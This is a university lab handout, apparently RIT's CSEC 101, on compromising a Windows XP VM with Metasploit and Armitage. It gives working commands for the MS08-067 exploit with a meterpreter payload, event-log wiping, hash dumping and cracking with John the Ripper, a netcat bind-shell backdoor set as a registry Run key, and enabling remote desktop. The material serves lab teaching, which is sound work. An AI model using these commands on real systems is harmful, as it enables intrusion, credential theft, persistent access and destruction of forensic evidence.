Lab 4 – Metasploit & Armitage PDF

Title	Lab 4 – Metasploit & Armitage
Course	Fundamentals of Computing Security
Institution	Rochester Institute of Technology
Pages	16
File Size	971 KB
File Type	PDF
Total Downloads	35
Total Views	148

Preview

CLICK TO PREVIEW PDF

Summary

Lab 4 – Metasploit & Armitage given by CSEC 101...

Description

Rochester Institute of Technology Department of Computing Security Lab 4 – Metasploit & Armitage

CSEC 101

Page 1 of 16

Objectives: To explore how to use basic Metasploit commands, and the respective Armitage interface in addition to basic post exploitation techniques. Disclaimer: This lab may be completed in either Security Lab (GOL 2410) or Airgap Lab (GOL 2130). All values within square brackets require your own input e.g. “ping [target computer]” = ping 192.168.1.1 All values within angular brackets require keyboard input. e.g. All double quotes in each command should be ignore unless specified. This lab will require signoffs which entails an instructor, lab assistant, or tutor who has CSEC 101 signoff abilities. To see which tutor or lab assistant has sign off capabilities, find the lab schedule. If you are seeking signoffs during open lab hours, ask lab assistants or tutors who are on-shift and working to sign you off. Tutors and lab assistants who are not working are not required to give signoffs. This is at the discretion of the perspective tutor or lab assistant. You are prohibited from sharing signoff sheets with other students. Passwords List: Username Kali Linux VM Root Windows XP SP0/1 Student VM

Password cseclabs student

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 2 of 16

Part I: Using Metasploit Using the lab machines in the Security Lab (GOL 2410) or Airgap Lab (GOL 2130), startup VMware Workstation and start an instance of Windows XP SP0/SP1 and Kali Linux. For the Windows XP SP0/SP1 VM, revert the image to the Service Pack 0 Snapshot. To help you later in the lab, obtain the IP addresses of both the Windows XP and Kali VM by doing an ipconfig or ifconfig (respectively). Fill out this information in the last page of this instruction sheet titled “SIGNOFF SHEET”. To start out, you will open two terminal sessions on your Kali VM. One terminal session will be used to run an nmap scan while the second will be used to run Metasploit. 1. On the Kali box, open a terminal session. 2. Start the Postgresql Database: /etc/init.d/postgresql start 3. Initialize the Metasploit Framework Database: msfdb init 4. Run msfconsole: msfconsole 5. Wait a while, you will see some text response. *Note, congratulations, you have started Metasploit. 6. Open a second terminal. You will use this terminal to run nmap 7. In the second terminal, type: nmap and explore all the options, especially –O, -A, and –v. 8. Now, in the second terminal, type: “nmap –O –A –v [IP of XP VM]” (Everything is always case sensitive). Notice at the bottom of the output there are lines regarding SMB security on the XP machine. What is SMB? Why is it vulnerable? Why it is important to also see, from the output, that port 445 is open? 9. Go back to the initial terminal running msfconsole (Metasploit). 10. Type: “search smb” to see all exploits associated with SMB. 11. We will pick ms08_067_netapi. Type: “search ms08_067_netapi” This

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 3 of 16

will give you the location where the exploit is located in Metasploit. 12. Type “info exploit/windows/smb/ms08_067_netapi” to learn more about this exploit we’ve selected. 13. Looks good! Now let’s type “use exploit/windows/smb/ms08_067_netapi” You’ll notice that the prompt change to a specific exploit prompt: msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > 14. Now you need to understand the difference between an exploit and a payload. The exploit is the flaw in the system that you are going to take advantage of. In the case of MS08-067, it is a problem is the SMB service. The modules that you searched for above are simply exploits. You can also search for exploits here on the command line by typing “search ms08” or whatever you are looking for. A payload is what you will send once the exploit has been executed. This payload represents the code that will be run on a system after a vulnerability has been found in the system, and an entry point is set. Many exploit kits use some sort of spyware as a payload. Metasploit also has a number of payloads. Different payloads work for different exploits. Some payloads include VNC payload (so you can view their screen), or a reverse TCP payload (so you can browse their filesystem, etc.) There is also a very powerful Meterpreter payload that has lots of additional commands we’ll look at. Type: “show payloads” to see all available payloads, and then “set payload windows/meterpreter/reverse_tcp” to pick this specific one. You’ll notice a line of output confirming that the payload has been set: msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp FYI, the following command unsets the payload, along with the corresponding output (but don’t do it): unset payload windows/meterpreter/reverse_tcp

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 4 of 16

Unsetting payload... Unsetting windows/meterpreter/reverse_tcp... 15. Now, we need to configure the exploit as per the need of the current scenario. Type "show options" and notice the various parameters which are required for the exploit to be launched properly. 16. Type: “show targets” This will give you all of the targets this exploit works for. Search for the one that matches your nmap output. It’s close to the top. 17. Type: “set TARGET [2]” 18. Type: “set RHOST [10.80.100.47]” 19. Type: “set LHOST [10.80.100.17]” 20. Type: “show options” to verify all of your settings are correct.

21. Type: “exploit” ….. Congratulations, you have a shell!

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 5 of 16

*Note, at this point, you should see the word “meterpreter”. If you do not, then you may have to review the previous steps to verify your work.

22. In the meterpreter prompt, type: “screenshot” 23. Look at the location where the screenshot was saved. Click the Places pull down menu at the top of the screen and then go to the Home folder. 24. Show your screenshot to your instructor or the lab assistant for a signoff. 25. Type “help” at the meterpreter prompt to see many other things you can do to the pwned machine! Which ones seem the most interesting and valuable to you?

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 6 of 16

Part II: Meterpreter Commands Meterpreter is a powerful asset to utilize in penetration testing, and in order to fully understand it’s capabilities—we will examine some advanced techniques. 1. In the Windows XP VM, locate “Event Viewer” (Start/right-click My Computer/Manage/look under System Tools), and examine the information it contains. 2. In the Kali VM with the previous Meterpreter prompt from Part I, execute the command “clearev” meterpreter > clearev [*] Wiping 38 records from Application... [*] Wiping 121 records from System... [*] Wiping 0 records from Security...

3. Go back to the Windows XP VM, refresh , and examine Event Viewer. 4. While still in the Windows XP VM, open task manager and view the processes tab. 5. In Task Manager, change the view (View, Select Columns, PID) to show the column PID (Process Identifier). A PID Column should appear in task manager. 6. In the Kali VM, type: “run post/windows/manage/migrate” within the meterpreter prompt. meterpreter > run post/windows/manage/migrate [*] Running module against XPBOB-GG87VQZOZ [*] Current server process: svchost.exe (960) [*] Spawning notepad.exe process to migrate to [+] Migrating to 880 [+] Successfully migrated to process 880

7. Go back to the Windows XP VM, and examine the new process that was generated from the migrate option in task manager. Explain to your instructor or lab assistant why both “clearev” and the migrate post modules can be useful as an offensive skillset. Additionally, show the newly created process generated by the migrate module in task manager for a signoff. Part III: Password Hashes and John The Ripper

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 7 of 16

Passwords are often stored in a system as a hash (although they should always be). This is a useful way to secure them in case a system becomes compromised as passwords in plaintext are humanly readable. Hash values are humanly incomprehensible. We will examine the integrity of the NTLM password scheme in Windows. 1. In the Windows XP VM, create the following five user accounts with the following parameters (passwords are case sensitive) A. B. C. D. E.

Username: weissman Username: upper Username: lower Username: mixed Username: story

Password: jonathan Password: PASSWORD Password: password Password: Password Password: 3bears

2. In the previous Meterpreter prompt from Part II, type “run winenum” and examine the contents of the text files with the results of your Windows enumeration. Open another terminal. Navigate to this directory cd /root/.msf4/logs/scripts/winenum/ Then, type ls to see the contents of the directory. There will be a directory there that contains text files with all the enumerated information. Type cd, then hit the space bar, and then the tab key, which will populate the name of the directory after the cd command. Hit . Now you’re in the directory with the text files. Type ls to see the contents of the directory.

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 8 of 16

View the contents of the text files with the cat utility: cat net_user.txt cat ipconfig__all.txt cat hashdump.txt …etc… Specifically, focus on the output from the hashdump.txt file:

3. Type john to see all available options for the John The Ripper password cracking utility. 4. Type john --format=nt hashdump.txt

Whoa! What do you see??? If John gets hung up on default Windows XP

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 9 of 16

accounts, and doesn’t return you to the prompt, hit Ctrl + C to kill it.

5. Type john --format=nt --show hashdump.txt, and show the output to your instructor for a signoff. 6. Type cat /usr/share/john/password.lst | less to see the contents of the John password file. Advance line by line with the Enter key. Advance page by page with the spacebar. Break out by hitting the q key. 7. Type cd /usr/share/wordlists, and then gzip -d rockyou.txt.gz. Now type cat /usr/share/wordlists/rockyou.txt | less To see if this more robust (compared to John) file has a specific password type: cat /usr/share/wordlists/rockyou.txt | grep | less For example: /usr/share/wordlists/rockyou.txt | grep password | less /usr/share/wordlists/rockyou.txt | grep p@ss | less /usr/share/wordlists/rockyou.txt | grep p@ssw0rd | less 8. Create a user with a more difficult password on the XP system (Although p@ssw0rd is not a safe password, the John list doesn’t have it, but rockyou does). To see if rockyou.txt can crack it, type john --wordlist=/usr/share/wordlists/rockyou.txt --format=nt hashdump.txt To see the results, type john --format=nt --show hashdump.txt

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 10 of 16

Part IV: Backdoor and Persistence Once you have exploited a machine, it is very important to maintain that level of access as patches, firewalls, and other fixes may occur over time, which may prevent you from using the same exploit. To maintain access, we will be using a tool called netcat, understanding persistence, and creating a backdoor. 1. In the Windows XP VM, click the Start button, in the Run bar type msconfig , and examine the Startup tab. *Note, msconfig is a powerful tool. All items checked in the Startup tab are programs that execute when you initially log on to a computer.

2. In the meterpreter prompt within the Kali VM, type the following: A. upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

This uploads the Windows version of netcat (nc.exe) to the compromised system. B. reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

The EnumKey method enables you to return the subkeys of a registry key or subkey. Note that the EnumKey method returns only the immediate subkeys of a key or subkey; it does not return any subkeys that might be contained within those top-level subkeys C. reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 5000 -e cmd.exe'

*Note, there is a space between –d ‘C:\windows\system32\nc.exe This writes to the registry key we accessed in the previous step. Specifically, we are starting a netcat listener on port 5000 of the compromised machine, so we can get back into it with a lot less effort! D. reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

This lets us know that we’re good! 

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 11 of 16

3. Now type: “exit” to leave the meterpreter session.

*Note, you should now be in the msf prompt.

4. Reboot the XP machine. 5. Under the msf prompt, type: “nc [IP of XP VM] 5000” *Note1, the number 5000 represents the port that was established in Part IV.2.C. *Note2, congratulations, you just used your newly created backdoor through a netcat tunnel.

6. Issue the command shutdown –r –t 5 –c “Computing Security” *Note1, There are double quotes around Computing Security. *Note2, the Windows XP VM should be restarting.

7. Type: “nc [IP of XP VM] 5000” again after the Windows XP VM completely restarts. *Note1, this kind of backdoor is highly vulnerable as anyone can access it as long as they have netcat on their machine. Please do not attempt to compromise fellow students’ Windows XP VMs! *Note2, for future reference, in controlled testing situations, it is recommended to nmap a subnet, and netcat various ports on a targeted machine. You may, one day, find a backdoor.

8. In the Kali VM using the netcat tunnel, figure a way to list all open ports on the Windows XP VM.

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 12 of 16

9. Go back to the Windows XP VM, and view the Startup tab of “msconfig” to find something interesting and cool. 10. Demonstrate to your instructor the command you used through the netcat tunnel in Step 8, explain what each command in step 2, and why we need two backslashes in step A, B, C, and D for a signoff. *Note1, You will have to do some research to give an explanation. Some keywords to search are: A. Windows Registry B. Reg command C. Netcat *Note2, for the double backslash portion, think programming.

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 13 of 16

Part V: Armitage Now that we have taken the scenic route using Metasploit, we’re now going to show you a tool called Armitage that uses Metasploit. You will find that this is a much faster way of using exploits. . 1. Start the Postgresql Database: /etc/init.d/postgresql start 2. Initialize the Metasploit Framework Database: msfdb init In the next steps, if you are experiencing problems with Armitage, this will help: step 1: http://http.kali.org/pool/main/a/armitage/ step 2: armitage_20150812-1kali1_all.deb step 3: go to the command prompt step 4: cd into the downloads folder step 5: type in "dpkg -i armitage_20150812-1kal11_all.deb" step 6: type in "armitage &disown" step 7: run armitage, should work In the Kali menu bar in the GUI, mouse over Applications, Favorites 08 Exploitation Tools, armitage. 1. Click Connect/Yes when the pop up menu appears. 2. The target host should already be there. If it is not or you wanted to start from scratch, go to Hosts -> Nmap Scan -> Quick Scan (OS detect) 3. Click on the target host (it will now be surrounded in a green dashed border) and on the left panel double click exploit -> windows -> smb -> ms08_067_netapi. Click Launch. When the machine is pwned, you will see a red border around the machine with lightning!

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 14 of 16

4. Right click on the host and click meterpreter1 -> Interact -> Meterpreter Shell 5. In the Meterpreter shell, type “run getgui –h” to see interesting options for our final exercise. In the XP machine, click Start, right-click My Computer, and click Properties. In the Remote tab, and notice that there is no check in the Remote Desktop section. Close the dialog box. Don’t worry. We can do that ourselves with Meterpreter: reg setval -k "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -v fDenyTSConnections -t REG_DWORD -d 0 Now look again in the Remote Desktop section. Voila! 6. In Meterpreter: run getgui -u csec -p rit, then open up another terminal and run this command: rdesktop -u csec -p rit 7. Take a peek in the XP VM, where the currently logged on user will be asked a question. Let’s pretend that the user is not in front of his computer. Wait for it…. Wait for it… What do you see in Kali now? Show your instructor for a sign off! 8. Remember, these sorts of changes can be very powerful. However, use that power wisely, as all of these steps alter the systems in ways that can be used by investigators to track what sort of actions were taken on the system. The more changes that are made, the more evidence you leave behind. When you are done with the current system, you will want to run the cleanup script provided to remove the added account. The cleanup command is shown in the bottom of the output here, and will be different for each time you use the run getgui command:

Rochester Institute of Technology Department of Computing Security CSEC 101

Lab 4 – Metasploit & Armitage

Page 15 of 16

Rochester Institute of Technology Department of Computing Security Lab 4 – Metasploit & Armitage

CSEC 101

Page 16 of 16

SIGNOFF SHEET (Handwritten or with Foxit app) Name:____________________________________ (1 Point)

Date:________________ (1 Point)

Scan and upload this document into the myCourses Dropbox for submission. All other documents will not be accountable for grading. Signatures must be shown on this signoff sheet. Keep this document for record if further questioning is needed. (3 Points) PART I:

Windows XP VM IP:_______________________________________ Kali VM IP: ______________________________________________

(10 Points) PART I:

Show your instructor or lab assistant the screenshot of the windows system after using the ms08_067_netapi exploit in the Kali VM.

Signature (25 Points) PART II:

Date

Printed Name

Date

Demonstrate to your instructor or lab assistant the command you use through the netcat tunnel. Explain what each command did, and why you needed double backslashes.

Signature (10 Points) PART V.8:

Printed Name

Show your instructor or lab assistant the cracked passwords from this exercise.
...